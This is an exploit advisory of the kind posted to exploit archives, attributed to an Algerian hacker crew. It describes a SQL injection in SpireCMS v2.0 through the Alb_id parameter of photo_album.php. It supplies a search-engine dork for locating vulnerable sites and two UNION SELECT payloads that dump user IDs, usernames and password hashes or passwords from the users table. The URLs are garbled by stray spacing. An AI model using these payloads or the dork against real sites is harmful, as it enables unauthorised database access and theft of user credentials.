ALGERIAN HACKER
* *******************-NORTH-africa security team -*********** ************
[!] SpireCMS v2.0 SQL Injection Vulnerability
[!] Author: Dr.0rYX and Cr3w-DZ
[!] MAIL: vx3@hotmail.de & Cr3w@hotmail.de
**************************************** ***********************************/
[Software Information]
[+] Vendor: http://www.spiread.com/
[+] Script: SpireCMS v2.0
[+] Download: http://www.spiread.com/demo/ (pipeline script)
[+] Vulnerability: php SQL injection
[+] Dork: inurl: "photo_album.php? Alb_id ="
**************************************** **********************************/
[Vulnerable File]
Http: // server/photo_album.php? Alb_id = [N. A.S.T]
[Exploit]
Http: // server/photo_album.php? Alb_id =-1 + UNION + SELECT + GROUP_Concat (id, 0x3a, username, 0x3a, password) + from + users
Http: // server/photo_album.php? Alb_id =-1 + UNION + SELECT + GROUP_Concat (id, 0x3a, username, 0x3a, password), null + from + users
[GReets]
[+]: Claw, le0n, exploit-db.com, ALL HACKERS MUSLIMS